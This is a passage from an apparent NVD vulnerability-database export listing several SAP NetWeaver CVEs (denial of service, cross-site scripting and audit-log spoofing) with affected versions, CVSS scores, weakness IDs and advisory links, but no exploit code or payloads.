{
"criteria": "cpe:2.3:a:sap:netweaver:7.01:sr1:*:*:*:*:*:*",
"matchCriteriaId": "5FAC1E9D-353F-4ADA-AF22-D2E14D927530",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.02:sp06:*:*:*:*:*:*",
"matchCriteriaId": "4A65157C-22CD-4B81-A830-BF878AD79421",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.30:sp04:*:*:*:*:*:*",
"matchCriteriaId": "AAB14187-850E-4CC6-8670-C03933CC768A",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:2004s:*:*:*:*:*:*:*",
"matchCriteriaId": "EB3FC705-6497-44AE-A520-809D320C1380",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "A Denial of Service vulnerability exists in the WRITE_C function in the msg_server.exe module in SAP NetWeaver 2004s, 7.01 SR1, 7.02 SP06, and 7.30 SP04 when sending a crafted SAP Message Server packet to TCP ports 36NN and/or 39NN."
},
{
"lang": "es",
"value": "Se presenta una vulnerabilidad de Denegaci\u00f3n de Servicio en la funci\u00f3n WRITE_C en el m\u00f3dulo msg_server.exe en SAP NetWeaver 2004s, versiones 7.01 SR1, 7.02 SP06 y 7.30 SP04, cuando se env\u00eda un paquete de SAP Message Server dise\u00f1ado hacia los puertos TCP 36NN y/o 39NN."
}
],
"id": "CVE-2013-1593",
"lastModified": "2024-11-21T01:49:57.040",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2020-01-23T20:15:11.730",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.securityfocus.com/bid/57956"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.securitytracker.com/id/1028148"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/82065"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://packetstormsecurity.com/files/cve/CVE-2013-1593"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://www.coresecurity.com/content/SAP-netweaver-msg-srv-multiple-vulnerabilities"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.securityfocus.com/bid/57956"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.securitytracker.com/id/1028148"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/82065"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://packetstormsecurity.com/files/cve/CVE-2013-1593"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://www.coresecurity.com/content/SAP-netweaver-msg-srv-multiple-vulnerabilities"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-129"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2022-02-09 23:15
Modified
2024-11-21 06:46
Severity ?
Summary
Due to insufficient encoding of user input, SAP NetWeaver allows an unauthenticated attacker to inject code that may expose sensitive data like user ID and password. These endpoints are normally exposed over the network and successful exploitation can partially impact confidentiality of the application.
References
Impacted products
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sap:netweaver:700:*:*:*:*:*:*:*",
"matchCriteriaId": "A7FED49E-6F9A-494A-9226-1059249960A0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:701:*:*:*:*:*:*:*",
"matchCriteriaId": "4836C36D-242F-4818-81B4-C170959D02F5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:702:*:*:*:*:*:*:*",
"matchCriteriaId": "6A503ABF-8655-40D7-96AD-2D7F19A673AE",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:731:*:*:*:*:*:*:*",
"matchCriteriaId": "8A9D5C5A-6963-438B-B0EA-2A621A34D8A9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:740:*:*:*:*:*:*:*",
"matchCriteriaId": "BFFA1591-0304-4FAE-A6A7-72D04D1F41A3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:750:*:*:*:*:*:*:*",
"matchCriteriaId": "7940A9AF-308E-4CE5-BA19-7A3DCF49F644",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:751:*:*:*:*:*:*:*",
"matchCriteriaId": "C09428E4-45BB-414D-9F3D-AA5C73D2DD5E",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:752:*:*:*:*:*:*:*",
"matchCriteriaId": "5ED0BA7D-939D-4B05-81A3-9F991C8C04F9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:753:*:*:*:*:*:*:*",
"matchCriteriaId": "0C2BF545-A7DC-4BB6-B894-D04CF163DD88",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:754:*:*:*:*:*:*:*",
"matchCriteriaId": "A75B2F18-60BE-41B5-82CB-520F794F2004",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:755:*:*:*:*:*:*:*",
"matchCriteriaId": "E31620E5-30FC-4545-A430-AAA77A66B51A",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:756:*:*:*:*:*:*:*",
"matchCriteriaId": "9724E131-9893-4630-96A2-EB6032D98C58",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Due to insufficient encoding of user input, SAP NetWeaver allows an unauthenticated attacker to inject code that may expose sensitive data like user ID and password. These endpoints are normally exposed over the network and successful exploitation can partially impact confidentiality of the application."
},
{
"lang": "es",
"value": "Debido a una codificaci\u00f3n insuficiente de la entrada del usuario, SAP NetWeaver permite a un atacante no autenticado inyectar c\u00f3digo que puede exponer datos confidenciales como el ID de usuario y la contrase\u00f1a. Estos endpoints est\u00e1n normalmente expuestos a trav\u00e9s de la red y una explotaci\u00f3n con \u00e9xito puede impactar parcialmente la confidencialidad de la aplicaci\u00f3n"
}
],
"id": "CVE-2022-22534",
"lastModified": "2024-11-21T06:46:58.527",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2022-02-09T23:15:18.533",
"references": [
{
"source": "cna@sap.com",
"tags": [
"Permissions Required"
],
"url": "https://launchpad.support.sap.com/#/notes/3124994"
},
{
"source": "cna@sap.com",
"tags": [
"Vendor Advisory"
],
"url": "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required"
],
"url": "https://launchpad.support.sap.com/#/notes/3124994"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html"
}
],
"sourceIdentifier": "cna@sap.com",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-79"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2016-10-05 16:59
Modified
2024-11-21 02:52
Severity ?
Summary
The (1) SAP_BASIS and (2) SAP_ABA components 7.00 SP Level 0031 in SAP NetWeaver 2004s might allow remote attackers to spoof IP addresses written to the Security Audit Log via vectors related to the network landscape, aka SAP Security Note 2190621.
References
| ▼ | URL | Tags | |
|---|---|---|---|
| cve@mitre.org | http://seclists.org/fulldisclosure/2016/Oct/3 | Mailing List, Third Party Advisory | |
| cve@mitre.org | http://www.securityfocus.com/bid/93288 | ||
| cve@mitre.org | https://www.onapsis.com/research/security-advisories/sap-security-audit-log-invalid-address-logging | Permissions Required, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | http://seclists.org/fulldisclosure/2016/Oct/3 | Mailing List, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | http://www.securityfocus.com/bid/93288 | ||
| af854a3a-2127-422b-91ae-364da2661108 | https://www.onapsis.com/research/security-advisories/sap-security-audit-log-invalid-address-logging | Permissions Required, Third Party Advisory |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sap:netweaver:2004s:*:*:*:*:*:*:*",
"matchCriteriaId": "EB3FC705-6497-44AE-A520-809D320C1380",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:sap_aba:7.00:sp_level_0031:*:*:*:*:*:*",
"matchCriteriaId": "0E4A33ED-CD2B-46B7-BD20-EEAF88B012D3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:sap_basis:7.00:sp_level_0031:*:*:*:*:*:*",
"matchCriteriaId": "C0CC87F8-734E-4EE4-9966-6204374CF704",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "The (1) SAP_BASIS and (2) SAP_ABA components 7.00 SP Level 0031 in SAP NetWeaver 2004s might allow remote attackers to spoof IP addresses written to the Security Audit Log via vectors related to the network landscape, aka SAP Security Note 2190621."
},
{
"lang": "es",
"value": "Los componentes (1) SAP_BASIS y (2) SAP_ABA 7.00 SP Level 0031 en SAP NetWeaver 2004s podr\u00eda permitir a atacantes remotos suplantar direcciones IP escritas en el Security Audit Log a trav\u00e9s de vectores relacionados con el entorno de red, vulnerabilidad tambi\u00e9n conocida como SAP Security Note 2190621."
}
],
"id": "CVE-2016-4551",
"lastModified": "2024-11-21T02:52:27.657",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.0"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2016-10-05T16:59:02.757",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://seclists.org/fulldisclosure/2016/Oct/3"
},
{
"source": "cve@mitre.org",
"url": "http://www.securityfocus.com/bid/93288"
},
{
"source": "cve@mitre.org",
"tags": [
"Permissions Required",
"Third Party Advisory"
],
"url": "https://www.onapsis.com/research/security-advisories/sap-security-audit-log-invalid-address-logging"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://seclists.org/fulldisclosure/2016/Oct/3"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.securityfocus.com/bid/93288"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required",
"Third Party Advisory"
],
"url": "https://www.onapsis.com/research/security-advisories/sap-security-audit-log-invalid-address-logging"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-284"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2012-02-23 20:07
Modified
2024-11-21 01:36
Severity ?
Summary
Cross-site scripting (XSS) vulnerability in b2b/auction/container.jsp in the Internet Sales (crm.b2b) module in SAP NetWeaver 7.0 allows remote attackers to inject arbitrary web script or HTML via the _loadPage parameter.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sap:netweaver:7.0:*:*:*:*:*:*:*",
"matchCriteriaId": "41FAC5DD-D577-47F9-B0CA-006032256642",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Cross-site scripting (XSS) vulnerability in b2b/auction/container.jsp in the Internet Sales (crm.b2b) module in SAP NetWeaver 7.0 allows remote attackers to inject arbitrary web script or HTML via the _loadPage parameter."
},
{
"lang": "es",
"value": "Vulnerabilidad de ejecuci\u00f3n de secuencias de comandos en sitios cruzados en b2b/auction/container.jsp en las ventas por Internet (crm.b2b) m\u00f3dulo en la plataforma SAP NetWeaver v7.0 permite a atacantes remotos inyectar secuencias de comandos web o HTML a trav\u00e9s del par\u00e1metro _loadPage."
}
],
"id": "CVE-2012-1290",
"lastModified": "2024-11-21T01:36:46.737",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
]
},
"published": "2012-02-23T20:07:25.907",
"references": [
{
"source": "cve@mitre.org",
"url": "http://dsecrg.com/pages/vul/show.php?id=414"
},
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "http://secunia.com/advisories/47861"
},
{
"source": "cve@mitre.org",
"url": "http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a"
},
{
"source": "cve@mitre.org",
"url": "http://www.securityfocus.com/bid/52101"
},
{
"source": "cve@mitre.org",
"url": "https://service.sap.com/sap/support/notes/1583300"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://dsecrg.com/pages/vul/show.php?id=414"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "http://secunia.com/advisories/47861"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.securityfocus.com/bid/52101"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://service.sap.com/sap/support/notes/1583300"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-79"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2009-01-28 18:30
Modified
2024-11-21 00:49
Severity ?
Summary
Cross-site scripting (XSS) vulnerability in Web Dynpro (WD) in the SAP NetWeaver portal, when Internet Explorer 7.0.5730 is used, allows remote attackers to inject arbitrary web script or HTML via a crafted URI, which causes the XSS payload to be reflected in a text/plain document.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| sap | netweaver | * | |
| microsoft | internet_explorer | 7.0.5730 |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sap:netweaver:*:*:*:*:*:*:*:*",
"matchCriteriaId": "5007E3B7-3C36-4256-9E01-51C6F52FD0FF",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:7.0.5730:*:*:*:*:*:*:*",
"matchCriteriaId": "E3B85C32-02F5-43F5-8BBB-5A240F99BAA9",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Cross-site scripting (XSS) vulnerability in Web Dynpro (WD) in the SAP NetWeaver portal, when Internet Explorer 7.0.5730 is used, allows remote attackers to inject arbitrary web script or HTML via a crafted URI, which causes the XSS payload to be reflected in a text/plain document."
},
{
"lang": "es",
"value": "Vulnerabilidad de ejecuci\u00f3n de secuencias de comandos en sitios cruzados (XSS) en el Web Dynpro (WD) en el portal SAP NetWeaver, cuando se usa con Internet Explorer v7.0.5730, permite a atacantes remotos inyectar secuencias de comandos web o HTML de su elecci\u00f3n a trav\u00e9s de una URI manipulada, lo que provoca que la carga XSS sea reflejada en un documento de texto plano."
}
],
"id": "CVE-2008-3358",
"lastModified": "2024-11-21T00:49:03.553",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
]
},
"published": "2009-01-28T18:30:00.170",
"references": [
{
"source": "cve@mitre.org",
"url": "http://osvdb.org/51627"
},
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "http://secunia.com/advisories/33685"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch"
],
"url": "http://service.sap.com/sap/support/notes/1235253"
},
{
"source": "cve@mitre.org",
"url": "http://www.csnc.ch/misc/files/advisories/CVE-2008-3358.txt"
},
{
"source": "cve@mitre.org",
"url": "http://www.securityfocus.com/archive/1/500415/100/0/threaded"
},
{
"source": "cve@mitre.org",
"url": "http://www.securityfocus.com/bid/33465"
},
{
"source": "cve@mitre.org",
"url": "http://www.securitytracker.com/id?1021638"
},
{
"source": "cve@mitre.org",
"url": "http://www.vupen.com/english/advisories/2009/0255"
},
{
"source": "cve@mitre.org",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/48237"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://osvdb.org/51627"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "http://secunia.com/advisories/33685"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch"
],
"url": "http://service.sap.com/sap/support/notes/1235253"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.csnc.ch/misc/files/advisories/CVE-2008-3358.txt"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.securityfocus.com/archive/1/500415/100/0/threaded"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.securityfocus.com/bid/33465"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.securitytracker.com/id?1021638"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.vupen.com/english/advisories/2009/0255"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/48237"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-79"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2018-10-09 13:29
Modified
2024-11-21 04:03
Severity ?
Summary
In SAP NetWeaver Application Server for ABAP, from 7.0 to 7.02, 7.30, 7.31, 7.40 and from 7.50 to 7.53, applications do not sufficiently encode user-controlled inputs, resulting in Cross-Site Scripting (XSS) vulnerability.
References
| ▼ | URL | Tags | |
|---|---|---|---|
| cna@sap.com | http://www.securityfocus.com/bid/105551 | Third Party Advisory, VDB Entry | |
| cna@sap.com | https://launchpad.support.sap.com/#/notes/2684760 | Vendor Advisory | |
| cna@sap.com | https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=500633095 | Vendor Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | http://www.securityfocus.com/bid/105551 | Third Party Advisory, VDB Entry | |
| af854a3a-2127-422b-91ae-364da2661108 | https://launchpad.support.sap.com/#/notes/2684760 | Vendor Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=500633095 | Vendor Advisory |
Impacted products
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sap:netweaver:*:*:*:*:*:*:*:*",
"matchCriteriaId": "7BE17035-1D33-4AD5-815C-D6D0F1B21C76",
"versionEndIncluding": "7.02",
"versionStartIncluding": "7.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:*:*:*:*:*:*:*:*",
"matchCriteriaId": "AA26CFC6-C8B5-433B-A22D-906A7BF4EFDA",
"versionEndIncluding": "7.53",
"versionStartIncluding": "7.50",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.30:*:*:*:*:*:*:*",
"matchCriteriaId": "606EFE4F-57A4-44E2-A98D-F0867A658218",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.31:*:*:*:*:*:*:*",
"matchCriteriaId": "FECD5E96-7669-4747-80D2-27F95BF420BC",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.40:*:*:*:*:*:*:*",
"matchCriteriaId": "F019F7F5-7740-4BD4-850F-D7A1923C6200",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "In SAP NetWeaver Application Server for ABAP, from 7.0 to 7.02, 7.30, 7.31, 7.40 and from 7.50 to 7.53, applications do not sufficiently encode user-controlled inputs, resulting in Cross-Site Scripting (XSS) vulnerability."
},
{
"lang": "es",
"value": "En SAP NetWeaver Application Server for ABAP desde la versi\u00f3n 7.0 hasta la 7.02, 7.30, 7.31, 7.40 y de la versi\u00f3n 7.50 a la 7.53, las aplicaciones no cifran lo suficiente las entradas controladas por el usuario, lo que resulta en una vulnerabilidad Cross-Site Scripting (XSS)."
}
],
"id": "CVE-2018-2470",
"lastModified": "2024-11-21T04:03:52.430",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2018-10-09T13:29:01.633",
"references": [
{
"source": "cna@sap.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.securityfocus.com/bid/105551"
},
{
"source": "cna@sap.com",
"tags": [
"Vendor Advisory"
],
"url": "https://launchpad.support.sap.com/#/notes/2684760"
},
{
"source": "cna@sap.com",
"tags": [
"Vendor Advisory"
],
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=500633095"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.securityfocus.com/bid/105551"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://launchpad.support.sap.com/#/notes/2684760"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=500633095"
}
],
"sourceIdentifier": "cna@sap.com",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-79"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2023-06-13 03:15
Modified
2024-11-21 08:06
Severity ?
6.1 (Medium) - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
6.1 (Medium) - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
6.1 (Medium) - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Summary
SAP NetWeaver Enterprise Portal - version 7.50, does not sufficiently encode user-controlled inputs over the network, resulting in reflected Cross-Site Scripting (XSS) vulnerability, therefore changing the scope of the attack. On successful exploitation, an attacker can view or modify information causing a limited impact on confidentiality and integrity of the application.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sap:netweaver:7.50:*:*:*:*:*:*:*",
"matchCriteriaId": "F2B37045-2FB7-49BB-AE38-B84FAA6ADFB0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "SAP NetWeaver Enterprise Portal - version 7.50, does not sufficiently encode user-controlled inputs over the network, resulting in reflected Cross-Site Scripting (XSS) vulnerability, therefore changing the scope of the attack. On successful exploitation, an attacker can view or modify information causing a limited impact on confidentiality and integrity of the application.\n\n"
}
],
"id": "CVE-2023-33985",
"lastModified": "2024-11-21T08:06:21.127",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
